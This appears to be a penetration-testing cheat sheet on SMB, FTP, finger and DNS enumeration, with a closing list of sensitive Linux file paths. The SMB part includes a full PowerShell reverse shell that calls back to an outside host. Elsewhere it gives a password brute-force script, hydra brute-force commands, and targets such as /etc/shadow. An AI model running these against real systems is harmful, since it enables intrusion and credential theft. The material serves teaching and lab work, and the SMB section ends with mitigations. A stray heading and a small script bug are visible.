139,445/tcp – SMB Enumeration

Vulnerabilities in SMB Shares are Medium risk vulnerability that is one of the most frequently found on networks around the world. This issue has been around since at least 1990 but has proven either difficult to detect, difficult to resolve or prone to being overlooked entirely.

Things that might be interesting:

  • check for null session
  • listing of shares
  • domain info
  • password policy
  • RID cycling output

Default shares are C$, ADMIN$, IPC$

Working ports below:

  • Port 135 – Remote Procedure Call (RPC)
  • Port 137 – NetBIOS Name Service
  • Port 138 – NetBIOS Datagram Service
  • Port 139 – NetBIOS Session Service

Information that can be gained includes (but not limited to):

  • Users and groups / shares
  • Operating system information
  • Password policies / Password hashes
  • Privileges / Permissions
  • Available shares

OS targets:

  • Windows server before 2003, 2008, 2012, 2016
  • Older Unix and Linux hosts

Before going more deeper, it's very important to understand services we are targeting i.e NETBIOS. NETBIOS provides three distinct services:

  • Session service (NetBIOS-SSN) for connection-oriented communication.
  • Name Service (NETBIOS-NS) for name registration and resolution.
  • Datagram distribution service (NetBIOS-DGM) for connectionless communication.

From above three services, we only going to focus on first two of them i.e NetBIOS-SSN & NETBIOS-NS

Session service (NetBIOS-SSN)

  • Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT (Netbios over TCP/IP), the session service runs on TCP port 139.

Name Service (NetBIOS-NS)

  • In order to start sessions or distribute datagrams, an application must register its NetBIOS name using the name service.
  • NetBIOS names are 16 octets in length and vary based on the particular implementation.
  • The name service operates on UDP port 137 (TCP port 137 can also be used, but rarely is).

SAMBA

  • Samba is a free software re-implementation of the SMB/CIFS networking protocol, and was originally developed by Andrew Tridgell.
  • Samba provides file and print services.
  • Samba runs on most Unix, OpenVMS and Unix-like systems, such as Linux, Solaris, AIX and the BSD variants, including Apple's OS X Server, and OS X client (version 10.2 and greater).
  • The name Samba comes from SMB (Server Message Block), the name of the standard protocol used by the Microsoft Windows network file system.

13.1 Denial-of-Service Attacks | Security Warrior

Enumeration

Metasploit

All these are modules that can help scan SMB

1. Identify SMB1 version

  • use auxiliary/scanner/smb/smb1
  • set RHOST 192.168.0.10
  • set RPORT 139
  • exploit

2. Identifies SMB2

  • use auxiliary/scanner/smb/smb2
  • set RHOST 192.168.0.10
  • set RPORT 139
  • exploit

3. Enumerate Shares

  • auxiliary/scanner/smb/smb_enumshares
  • set RHOST 192.168.0.10
  • set RPORT 139
  • exploit

4. Enumerate users (can set a list of users and passwords to test)

  • auxiliary/scanner/smb/smb_enumusers
  • set RHOST 192.168.0.10
  • set RPORT 139
  • exploit
  • show options

These are additional modules that can be used for further enumeration

  • auxiliary/scanner/smb/smb_login
  • auxiliary/scanner/smb/smb_lookupsid
  • auxiliary/scanner/smb/smb_ms17_010
  • auxiliary/scanner/smb/smb_uninit_cred
  • auxiliary/scanner/smb/smb_version
  • auxiliary/scanner/smb/smb_enum_gpp
  • auxiliary/scanner/smb/smb_enumusers_domain

Nmap

1. Basic SMB enumeration scripts

  • nmap -p 139, 445 --script smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users 192.168.0.10
  • nmap --script smb-enum* -p 139,445 192.168.0.10

2. Scanning for known vulnerabilities

  • nmap -p 139, 445 --script smb-vuln-conficker,smb-vuln-cve-2017-7494,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-ms17-010,smb-vuln-regsvc-dos,smb-vuln-webexec 192.168.0.10
  • nmap --script smb-vuln* -p 139,445 192.168.0.10

3. Host information

  • nmap -p 139, 445 --script smb-os-discovery,smb-protocols,smb-psexec,smb-security-mode,smb-server-stats,smb-system-info 192.168.0.10

4. Scan for SMB2

nmap -p 139, 445 --script smb2-capabilities,smb2-security-mode,smb2-time,smb2-vuln-uptime 192.168.0.10

nmblookup

NetBIOS over TCP/IP client used to lookup NetBIOS names

-A, --lookup-by-ip = Do a node status on <name> as an IP Address

  • nmblookup -A 192.168.0.10

smbmap

SMB enumeration tool

1. Enumerate Shares

-H HOST = IP of host

-P PORT = SMB port (default 445)

  • smbmap -H 192.168.0.10
  • smbmap -P 139 -H 192.168.0.10

2. Enumerate host OS

-v = Return the OS version of the remote host

  • smbmap -v -P 139 -H 192.168.0.10

3. Do recursive enumeration of directories and files based on a shares

-r [PATH] = List contents of directory, default is to list root of all shares, ex. -r 'C$\Documents'

  • smbmap -r 'kathy' -P 139 -H 192.168.0.10

-R [PATH] = Recursively list dirs, and files (no share\path lists ALL shares), ex. 'C$\Finance'

  • smbmap -R 'kathy' -P 139 -H 192.168.0.10

4. Only show READ/WRITE directories

-q = Quiet verbose output. Only shows shares you have READ or WRITE on, and suppresses file listing when performing a search

  • smbmap -P 139 -H 192.168.0.10 -q

5. Display help menu

  • smbmap --help

6. Download files from a share

--download PATH = Download a file from the remote system, ex.'C$\temp\passwords.txt'

  • smbmap -R ‘tmp’ -P 139 -H 192.168.0.10
  • smbmap -P 139 -H 192.168.0.10 --download 'tmp\ls'
  • ls -l 192.168.0.10-tmp_ls
  • cat 192.168.0.10-tmp_ls

7. Upload a file to a share, need write access

--upload SRC DST = Upload a file to the remote system ex. '/tmp/payload.exe C$\temp\payload.exe'

  • smbmap -P 139 -H 192.168.0.10 --upload "test.txt" 'tmp\test.txt'
  • smbmap -R 'tmp' -P 139 -H 192.168.0.10

8. Delete files

--delete PATH TO FILE = Delete a remote file, ex. 'C$\temp\msf.exe'

  • smbmap -P 139 -H 192.168.0.10 --delete 'tmp\test.txt'
  • smbmap -R 'tmp' -P 139 -H 192.168.0.10

9. You can use User credentials to check on the shares

-u USERNAME = Username, if omitted null session assumed

-p PASSWORD = Password or NTLM hash

  • smbmap -u SHayslett -p SHayslett -H 192.168.0.10 -P 139

10 You can execute systems commands

-x COMMAND = Execute a command ex. 'ipconfig /all'

  • smbmap -x 'ifconfig' -H 192.168.0.10

11. Specify a domain and share

-s SHARE = Specify a share (default C$), ex 'C$'

-d DOMAIN = Domain name (default WORKGROUP)

  • smbmap -d WORKGROUP -s kathy -H 192.168.0.10

12. Reverse shell

  • smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -H 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

enum4linux

Enum4linux is a tool for enumerating information from Windows and Samba systems.

1. Display basic help

  • enum4linux --help

2. Basic command to run all the scripts

-a = Do all simple enumeration (-U -S -G -P -r -o -n -i)

  • enum4linux -a 192.168.0.10

3. You can specify a username and password if you know one

-u user specify username to use (default "")

-p pass specify password to use (default "")

  • enum4linux -u user -p password 192.168.0.10

4. Check to see if a user exists on the system

-k user = User(s) that exists on remote system (default: administrator,guest,krbtgt,domain,admins,root,bin,none)

  • enum4linux -k Ronaldo 192.168.0.10

nbtscan

This is a command utility that tries to scan NetBIOS name servers open on a local or remote TCP/IP network and because it is a first step in finding open shares.

1. Basic help

  • nbtscan

2. Basic scan, it can be an IP or a network range

  • nbtscan 192.168.0.10

3. Use local port 137 for scans

-r use local port 137 for scans. Win95 boxes respond to this only.

  • nbtscan 192.168.0.10 -r

rpcclient

rpcclient is a utility initially developed to test MS-RPC functionality in Samba itself

1. Display basic help

  • rpcclient --help

2. Stablish a null session, only available in SMB1

-N, --no-pass = Don't ask for a password

  • rpcclient -U “” -N 192.168.0.10

3. Having a communication you can enumerate more than you think

  • srvinfo

  • querydominfo

  • getdompwinfo

  • netshareenum

4. Using credentials can help explore more than what null session provides

  • rpcclient -U james 10.10.10.52
  • <Password> - J@m3s_P@ssW0rd!

5. Enumerate users (RID)

  • enumdomusers

  • queryuser 0x1f4

  • lookupnames administrator

6. Enumerate groups (RID)

  • enumdomgroups

  • querygroup 0x201

  • querygroupmem 0x201

  • enumalsgroups domain

  • enumalsgroups builtin

7. Enumerate credentials

  • getdompwinfo

  • getusrdompwinfo 0x1f4

8. You can also try to brutefoce by running a command, and test passwords, we know that min_password_length is 7 char

Success

  • rpcclient -U james -c "getusername;quit" 10.10.10.52
  • rpcclient -U james%J@m3s_P@ssW0rd! -c "getusername;quit" 10.10.10.52

Failure

  • rpcclient -U james -c "getusername;quit" 10.10.10.52

Bash script

1. This script will go through a password list and test the rpcclient command until it guesses the password, then writes a file named password_result.txt with the actual hit

  • vi smb_bruteforce.sh

for i in `cat pass.txt`; do

if rpcclient -U "james%$i" -c "getusername;quit" 10.10.10.52; then

echo "$i" > password_result.txt

echo "[+] The password is $1 and has been saved in password_result.txt"

fi

done

2. Create a wordlist

  • cat pass.txt

3. Run the script

  • bash smb_bruteforce.sh

4. Read the result

  • cat password_result.txt

smbclient

1. Display help

  • smbclient --help

2. Connect

  • smbclient -L \\10.10.10.100

3. Null session

  • smbclient \\\\10.10.10.100\\ipc$
  • help

4. Log in as anonymous

  • smbclient -L //10.10.10.100/myshare -U anonymous

nullinux

Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB.

If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted.

https://github.com/m8r0wn/nullinux

1. Download the tool

  • git clone https://github.com/m8r0wn/nullinux.git

2. Run the install script

  • cd nullinux
  • ls
  • sudo bash setup.sh

3. Install python modules (in this case I needed ipparser)

  • sudo pip3 install ipparser

4. Run the tool, help menu

-h, --help = show this help message and exit

  • python3 nullinux.py -h

5. Basic scan

  • python3 nullinux.py 10.10.10.100

6. Using Credentials can give us more information

-u USERNAME, -U USERNAME

-p PASSWORD, -P PASSWORD

  • python3 nullinux.py -u james -p J@m3s_P@ssW0rd! 10.10.10.52

Bonus

SMB - Null Session

Net BIOS null Sessions occurs when you connect any remote system without user-name and password. It is usually found in systems with Common Internet File System (CIFS) or Server Message Block (SMB) depending on operating system.

By default null sessions are enabled in Windows 2000 and Windows NT. Actually it is also enabled by default in Windows XP and Windows 2003 Server but they don’t allow enumeration of user accounts.

Null session functionality within the SMB protocol, Null Sessions are a ‘feature’ of Windows allowing an anonymous user to connect to the IPC$ share and enumerate certain information.

Some of these shares allow one to access the complete storage device on remote systems. For example, C$ will allow one to access the C Drive. Another share, Admin$, allows one to access the Windows installation directory. Folders followed by “$” are hidden.

IPC$ is a special share that is used to facilitate inter-process communication (IPC). That is, it doesn’t allow one to access files or directories like other shares, but rather allows one to communicate with processes running on the remote system.

Connect

Windows:

  • net use \\IP_ADDRESS\ipc$ "" /user:""
  • net use \\192.168.23.1\ipc$ /u:”” “”
  • <enter>
  • net use
  • net view \\192.168.1.1

Linux:

  • rpcclient -U "" IP_ADDRESS
  • <enter>

or

  • smbclient -L //<IP ADDRESS>
  • <enter>

  • smbclient //10.10.10.100/Replication
  • recurse ON
  • prompt OFF
  • mget *

This one is used to download all the files from the share, when anonymous log in is enabled.

As an example you could get Groups.xml (deprecated on newer windows 2012, 2016)

gpp-decrypt is used against the hash

smbmap

1. SMBMap allows users to enumerate samba share drives across an entire domain. List share drives, drive permissions, share contents, upload/download functionality, file name auto-download pattern matching, and even execute remote commands.

  • smbmap -H 10.10.10.100

2. Use SMB client to login to the file share that you show any permission READ/WRITE, use a fake user if it fails to connect

  • smbmap -u <any user> -H <IP ADDRESS>

3. This one below shows recursive listing. Letting us through the share files.

  • smbmap -R <Replication> -H 10.10.10.100 -A <Groups.xml> -q
  • smbmap -R -H 10.10.10.100

4. This one is for finding a file, if matches, it downloads it.

  • smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100

Using credentials, we may find more permissions.

While connected here are some interesting commands:

‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’, ‘querydominfo’, “netsharegetinfo”, “srvinfo”, “getdompwinfo”, “enumdomgroups”, “querygroup”, “queryuser”, “lookupnames”, “queryaliasmem”, “querygroupmem”, “lookupsids”

Mounting the share to reveal the contents:

1. Create a directory to mount

  • mkdir /mnt/smb

2. mount it

  • mount -t cifs //<IP ADDRESS>/Backups /mnt/smb
  • <enter>

3. show it mounted

  • ls -lR /mnt/smb

Tools

Getacct: https://packetstormsecurity.com/search/files/?q=GetAcct

1. rpcbind

2. net use (windows)

3. enum4linux

4. nmap

5. nbtstat (windows)

6. Nmblookup

7. metasploit

(alternatives)

1. Winfo: http://www.ntsecurity.nu/toolbox/winfo/

  • Windows domain to which the system belongs
  • Security policy settings
  • Local usernames
  • Drive shares

2. DumpSec: https://www.systemtools.com/somarsoft/index.html

3. Netusers: https://www.systemtools.com/cgi-bin/download.pl?NetUsers

  • Abused account privileges
  • Users currently logged into the system

4. RID_ENUM: https://github.com/trustedsec/ridenum

Solution

This vulnerability can be mitigated by setting the DWORD value ‘RestrictAnonymous’ to 1 in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA

Block NetBIOS on your Windows server by preventing these TCP ports from passing through your network firewall or personal firewall:

  1. 139 (NetBIOS sessions services)
  2. 445 (runs SMB over TCP/IP without NetBIOS)

Disable File and Printer Sharing for Microsoft Networks in the Properties tab of the machine’s network connection for those systems that don’t need it.

Docs

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-security-allow-localsystem-null-session-fallback

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/network-access-restrict-anonymous-access-to-named-pipes-and-shares

https://www.beyondsecurity.com/scan_pentest_network_vulnerabilities_null_session_availablesmb

https://sensepost.com/blog/2018/a-new-look-at-null-sessions-and-user-enumeration/

21/tcp FTP – Enumeration

FTP is a method to access and share files on the internet. The protocol is a way to communicate between computers on a TCP/IP network, FTP is a TCP based service exclusively and it is a client-server protocol where a client will communicate with a server.

"File Transfer Protocol," can transfer files between any computers that have an Inter communication, and also works between computers using totally different operating systems.

Anonymous FTP is a type of FTP that allows users to access files and other data without needing an ID or password.

  • Transferring files from a client computer to a server computer is called "uploading"
  • Transferring from a server to a client is "downloading"

How does it work

There are two distinct communication channels while establishing an FTP connection.

  • Port 21: The first one is called the command channel where it initiates the instruction and response.
  • Port 20: The other one is called a data channel, where the distribution of data happens. The confusion begins however, when we find that depending on the mode, the data port is not always on port 20.

Types of FTP communication

he FTP server may support Active or Passive connections or both. Most FTP client programs select passive connection mode by default because server administrators prefer it as a safety measure.  Firewalls generally block connections that are "initiated" from the outside.  Using passive mode, the FTP client (like Auto FTP Manager) is "reaching out" to the server to make the connection.  The firewall will allow these outgoing connections, meaning that no special adjustments to firewall settings are required.

Active

Active FTP connection, the client opens a port and listens and the server actively connects to it.

command: client >1023 (to ->) server 21

data: client >1023 (<- to) server 20

  • In active mode FTP the client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21.
  • Then, the client starts listening to port N+1 and sends the FTP command PORT N+1 to the FTP server.
  • The server will then connect back to the client's specified data port from its local data port, which is port 20.

https://slacksite.com/images/ftp/activeftp.gif

From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened:

  • FTP server's port 21 from anywhere (Client initiates connection)
  • FTP server's port 21 to ports > 1023 (Server responds to client's control port)
  • FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port)
  • FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port)

FTP Active vs. Passive Mode

Passive

Passive FTP connection, the server opens a port and listens (passively) and the client connects to it.  You must grant Auto FTP Manager access to the Internet and to choose the right type of FTP Connection Mode

command: client >1023 (to ->) server 21

data: client >1024 (to ->) server >1023

  • In passive mode FTP the client initiates both connections to the server, solving the problem of firewalls filtering the incoming data port connection to the client from the server.
  • When opening an FTP connection, the client opens two random unprivileged ports locally (N > 1023 and N+1). The first port contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command.
  • The result of this is that the server then opens a random unprivileged port (P > 1023) and sends P back to the client in response to the PASV command. The client then initiates the connection from port N+1 to port P on the server to transfer data.

From the server-side firewall's standpoint, to support passive mode FTP the following communication channels need to be opened:

  • FTP server's port 21 from anywhere (Client initiates connection)
  • FTP server's port 21 to ports > 1023 (Server responds to client's control port)
  • FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server)
  • FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port)

http://2.bp.blogspot.com/_I1ZBNiAGCBw/TAJ0yNwZbUI/AAAAAAAAADQ/_fM29y9oYfs/s400/FTP+Passive+Mode.gif

FTP command table

Task

DOS Command

Notes

Change user password on a site

Literal SITE PSWD oldpassword newpassword

"Literal" sends a command line to the remote FTP connection and executes the SITE PSWD command.

Connect to the specified FTP host on the specified port

open [host] [port]

For example, type:

open myftpsite.com 21

Navigate to a different directory on remote machine

cd [directory]

For example, type:

cd M:\InetPub\EFTRoot\MySite\Usr\jbug

Change to parent directory

cdup

Same as cd ..\

Changes directory on local machine

lcd [path]

For example, type lcd c:\temp.

Displays a list of files and folders in the current remote directory

dir [path]

ls [directory] [localfile]

For example, type:

dir M:\InetPub\EFTRoot\MySite\Usr\jbug

or

ls M:\InetPub\EFTRoot\MySite\Usr\jbug C:\temp\contents.txt

Creates a directory on the remote file system

mkdir [name]

For example, to create a folder into which you will upload your graphics files, type:

mkdir images

Copies a file from the local to the remote computer

put [filename.ext]

To upload the file with a different name, use

put oldfilename.ext newfilename.ext

Copies multiple files from the local to the remote computer

mput [files]

Puts multiple files; *.* puts all files; *.txt puts all .txt files, my_*.* puts all files that start with my_ with any extension.

Copies a file from the remote to the local computer

get [filename.ext]

For example, type:

get dog.jpg

Copies multiple files from the remote to the local computer

mget [files]

Gets multiple files; *.* gets all files; *.txt gets all .txt files, my_*.* gets all files that start with my_ with any extension.

Deletes a file

delete [filename.ext]

For example, type:

delete dog.jpg

Renames a file

rename [filename] [filename]

For example, to rename a picture of your dog, Pooh Bear, type:

rename dog.jpg PoohBear.jpg

Removes a directory on the remote computer

rmdir [name]

For example, type:

rmdir olddogpics

List current working directory

pwd

Use when you forget which directory you are in or if you want to copy the path

Close connection

bye (or quit)

Disconnect from remove FTP server

List of available commands or help for a specific command

help

help [command]

? [command]

help by itself lists available FTP commands; help [command] or ? [command] provides help for the specific command

Change transfer mode to ASCII

ascii

Used for HTML and text files

Change transfer mode to binary

binary

Used for graphics, compressed files, audio clips, etc.

Displays current transfer mode (ASCII or binary)

status

Query the status of files, transfers in process, and other system information. The STAT command implemented on some FTP servers could allow a remote attacker to obtain sensitive information; therefore, it is disabled on some servers.

Enable/disable prompts

prompt

Use this command if you do not want to be prompted for each file transfer when transferring multiple files.

Enumeration

Nmap

1. Basic enumeration scan

  • nmap -p 21 -A -sV -sC 192.168.0.7

2. Using NSE scripts

  • nmap -p 21 --script ftp-anon,ftp-bounce,ftp-brute,ftp-libopie,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 192.168.0.7

Metasploit

1. Enumerate banner

  • use auxiliary/scanner/ftp/ftp_version
  • show options
  • set RHOSTS 192.168.0.7
  • exploit

Secure banner: Edit the config file located in /etc, in our case it is named vsftpd.conf, enable custom banner, by uncommenting the line:

Before

After

Then restart the service and test again.

2. Brute force with Metasploit

  • use auxiliary/scanner/ftp/ftp_login
  • show options
  • set blank_passwords true
  • set RHOSTS 192.168.0.7
  • set USERNAME anonymous
  • exploit

You can set password, username lists, stop on success, etc.

3. Find the privileges of anonymous login

  • use auxiliary/scanner/ftp/anonymous
  • show options
  • set rhosts 192.168.0.7
  • exploit

Connect using FTP command

1. Once, the username & password are identified. Or if anonymous log in is enabled. Access the remote service

  • ftp 192.168.0.10
  • USER: anonymous
  • PASS: anonymous

2. Once authenticated, you are permitted to run commands depending on permissions of the user.

  • pwd
  • dir
  • get lol.pcap

3. Since, we have read permission we could download the file

  • ls -l lol.pcap

Hydra

You can brute force log in using hydra

  • hydra -s 21 -C /usr/share/legion/wordlists/ftp-default-userpass.txt -u -f 192.168.0.7 ftp

There are other methods to enumerate ftp like capturing network traffic, sometime ftp is sent over insecure networks.

Once, you get log in you can explore and navigate through the file system, read or even write files.

I captured traffic using Wireshark and I see the log in messages flowing through the network

79/tcp finger – Enumeration

Finger is primarily used to enumerate user information on the target system. It can also find out detailed information (if exists) such as full name, email address, phone number etc. of all its users.

Nmap result

finger-user-enum

finger-user-enum is a script used to enumerate users

https://github.com/pentestmonkey/finger-user-enum

Username guessing tool primarily for use against the default Solaris finger service.

Installation

  • git clone https://github.com/pentestmonkey/finger-user-enum.git
  • ls -l finger-user-enum

Using finger-user-enum

1. Displaying help

  • perl finger-user-enum.pl -h

2. enumerate a single user

-u = user

-t = host IP

  • perl finger-user-enum.pl -u root -t 10.10.10.76

We can see output of root user, it means the user exists (1 result). On the other hand, the screenshot below would show (0 results).

  • perl finger-user-enum.pl -u vry4n -t 10.10.10.76

3. Enumerate users using a list

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

4. Using a list of IPs

  • perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -T IP_list.txt

5. Using another port than default 79

  • perl finger-user-enum.pl -p 8000 -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76

6. Showing detailed output

  • perl finger-user-enum.pl -d -u root -t 10.10.10.76

Metasploit

1. Metasploit has a module for finger scan (auxiliary/scanner/finger/finger_users)

  • use auxiliary/scanner/finger/finger_users
  • show options
  • set RHOSTS 10.10.10.76
  • set USERS_FILE /usr/share/seclists/Usernames/Names/names.txt
  • exploit

Using finger

Finger is a tool used to enumerate users using port 79. Finger may be used to look up users on a remote machine. The format is to specify a user as “user@host”, or “@host”

1. Display man page for help

  • man finger

2. enumerate a known user. In this case root

  • finger -s root@10.10.10.76

3. Show the home directory of the user

  • finger -sl root@10.10.10.76

4. Preventing the -l option from displaying the contents of the “.plan”, “.project” and “.pgpkey” files.

  • finger -slp sammy@10.10.10.76

53/tcp DNS – Dig enumeration

Dig stands for (Domain Information Groper). Dig is a network administration command-line tool for querying Domain Name System (DNS) name servers. It is useful for verifying and troubleshooting DNS problems and also to perform DNS lookups and displays the answers that are returned from the name server that were queried. dig is part of the BIND domain name server software suite. dig command replaces older tool such as nslookup and the host. dig tool is available in major Linux distributions.

Install Dig on Linux

Debian

  • apt-get install dnsutils

CentOS 7

  • yum install bind-utils

Dig Syntax

In its simplest form, the syntax of the dig utility will look like this:

  • dig [server] [name] [type]

[server] – the IP address or hostname of the name server to query

If the server argument is the hostname then dig will resolve the hostname before proceeding with querying the name server.

It is optional and if you don’t provide a server argument then dig uses the name server listed in /etc/resolv.conf

[name] – the name of the resource record that is to be looked up

[type] – the type of query requested by dig. For example, it can be an A record, MX record, SOA record or any other types. By default dig performs a lookup for an A record if no type argument is specified.

Queries

Dig Commands Cheatsheet

Dig a Domain Name

  • dig yahoo.com

UNDERSTAND THE OUTPUT:

  1. Lines beginning with ; are comments not part of the information.
  2. The first line tell us the version of dig (9.11.5) command.
  3. Next, dig shows the header of the response it received from the DNS server
  4. Next comes the question section, which simply tells us the query, which in this case is a query for the “A” record of yahoo.com. The IN means this is an Internet lookup (in the Internet class).
  5. The answer section tells us that yahoo.com has the IP address 72.30.38.140
  6. Lastly there are some stats about the query. You can turn off these stats using the +nostats option.

Short Answers

  • dig yahoo.com +short

Detailed Answers

  • dig yahoo.com +noall +answer

Specifying Nameservers

  • dig @8.8.8.8 yahoo.com

The following dig command sends the DNS query to Google’s name server(8.8.8.8) by using the @8.8.8.8 option

Query All DNS Record Types

  • dig yahoo.com ANY

Search For Record Type

  • dig yahoo.com MX
  • dig yahoo.com NS
  • dig yahoo.com A
  • dig yahoo.com SOA

Trace DNS Path

  • dig yahoo.com +trace

Reverse DNS Lookup

  • dig +answer -x 98.138.219.231

Reverse DNS lookup lets you look up the domain and hostname associated with an IP address.

Batch Queries

  • dig -f domain_name.txt +short

provide dig with a list of domain names – one per line in a file

Custom Query

  • dig axfr @10.10.10.13 cronos.htb

Those different domains in the output point to the same IP.

Linux Interesting Files

Here you have a list of Linux Interesting files. They can be used to extract sensitive information leading to further exploitation.

It is always important to read the Administrator Guide of any application and appli the best security practices to configiguration file.

Any misconfiguration is a potential vector of attack.

• /etc/passwd
• /etc/shadow
• /etc/aliases
• /etc/anacrontab
• /etc/apache2/apache2.conf
• /etc/apache2/httpd.conf
• /etc/at.allow
• /etc/at.deny
• /etc/bashrc
• /etc/bootptab
• /etc/chrootUsers
• /etc/chttp.conf
• /etc/cron.allow
• /etc/cron.deny
• /etc/crontab
• /etc/cups/cupsd.conf
• /etc/exports
• /etc/fstab
• /etc/ftpaccess
• /etc/ftpchroot
• /etc/ftphosts
• /etc/groups
• /etc/grub.conf
• /etc/hosts
• /etc/hosts.allow
• /etc/hosts.deny
• /etc/httpd/access.conf
• /etc/httpd/conf/httpd.conf
• /etc/httpd/httpd.conf
• /etc/httpd/logs/access_log
• /etc/httpd/logs/access.log
• /etc/httpd/logs/error_log
• /etc/httpd/logs/error.log
• /etc/httpd/php.ini
• /etc/httpd/srm.conf
• /etc/inetd.conf
• /etc/inittab
• /etc/issue
• /etc/lighttpd.conf
• /etc/lilo.conf
• /etc/logrotate.d/ftp
• /etc/logrotate.d/proftpd
• /etc/logrotate.d/vsftpd.log
• /etc/lsb-release
• /etc/motd
• /etc/modules.conf
• /etc/motd
• /etc/mtab
• /etc/my.cnf
• /etc/my.conf
• /etc/mysql/my.cnf
• /etc/network/interfaces
• /etc/networks
• /etc/npasswd
• /etc/passwd
• /etc/php4.4/fcgi/php.ini
• /etc/php4/apache2/php.ini
• /etc/php4/apache/php.ini
• /etc/php4/cgi/php.ini
• /etc/php4/apache2/php.ini
• /etc/php5/apache2/php.ini
• /etc/php5/apache/php.ini
• /etc/php/apache2/php.ini
• /etc/php/apache/php.ini
• /etc/php/cgi/php.ini
• /etc/php.ini
• /etc/php/php4/php.ini
• /etc/php/php.ini
• /etc/printcap
• /etc/profile
• /etc/proftp.conf
• /etc/proftpd/proftpd.conf
• /etc/pure-ftpd.conf
• /etc/pureftpd.passwd
• /etc/pureftpd.pdb
• /etc/pure-ftpd/pure-ftpd.conf
• /etc/pure-ftpd/pure-ftpd.pdb
• /etc/pure-ftpd/putreftpd.pdb
• /etc/redhat-release
• /etc/resolv.conf
• /etc/samba/smb.conf
• /etc/snmpd.conf
• /etc/ssh/ssh_config
• /etc/ssh/sshd_config
• /etc/ssh/ssh_host_dsa_key
• /etc/ssh/ssh_host_dsa_key.pub
• /etc/ssh/ssh_host_key
• /etc/ssh/ssh_host_key.pub
• /etc/sysconfig/network
• /etc/syslog.conf
• /etc/termcap
• /etc/vhcs2/proftpd/proftpd.conf
• /etc/vsftpd.chroot_list
• /etc/vsftpd.conf
• /etc/vsftpd/vsftpd.conf
• /etc/wu-ftpd/ftpaccess
• /etc/wu-ftpd/ftphosts
• /etc/wu-ftpd/ftpusers
• /logs/pure-ftpd.log
• /logs/security_debug_log
• /logs/security_log
• /opt/lampp/etc/httpd.conf
• /opt/xampp/etc/php.ini
• /proc/cpuinfo
• /proc/filesystems
• /proc/interrupts
• /proc/ioports
• /proc/meminfo
• /proc/modules
• /proc/mounts
• /proc/stat
• /proc/swaps
• /proc/version
• /proc/self/net/arp
• /root/anaconda-ks.cfg
• /usr/etc/pure-ftpd.conf
• /usr/lib/php.ini
• /usr/lib/php/php.ini
• /usr/local/apache/conf/modsec.conf
• /usr/local/apache/conf/php.ini
• /usr/local/apache/log
• /usr/local/apache/logs
• /usr/local/apache/logs/access_log
• /usr/local/apache/logs/access.log
• /usr/local/apache/audit_log
• /usr/local/apache/error_log
• /usr/local/apache/error.log
• /usr/local/cpanel/logs
• /usr/local/cpanel/logs/access_log
• /usr/local/cpanel/logs/error_log
• /usr/local/cpanel/logs/license_log
• /usr/local/cpanel/logs/login_log
• /usr/local/cpanel/logs/stats_log
• /usr/local/etc/httpd/logs/access_log
• /usr/local/etc/httpd/logs/error_log
• /usr/local/etc/php.ini
• /usr/local/etc/pure-ftpd.conf
• /usr/local/etc/pureftpd.pdb
• /usr/local/lib/php.ini
• /usr/local/php4/httpd.conf
• /usr/local/php4/httpd.conf.php
• /usr/local/php4/lib/php.ini
• /usr/local/php5/httpd.conf
• /usr/local/php5/httpd.conf.php
• /usr/local/php5/lib/php.ini
• /usr/local/php/httpd.conf
• /usr/local/php/httpd.conf.ini
• /usr/local/php/lib/php.ini
• /usr/local/pureftpd/etc/pure-ftpd.conf
• /usr/local/pureftpd/etc/pureftpd.pdn
• /usr/local/pureftpd/sbin/pure-config.pl
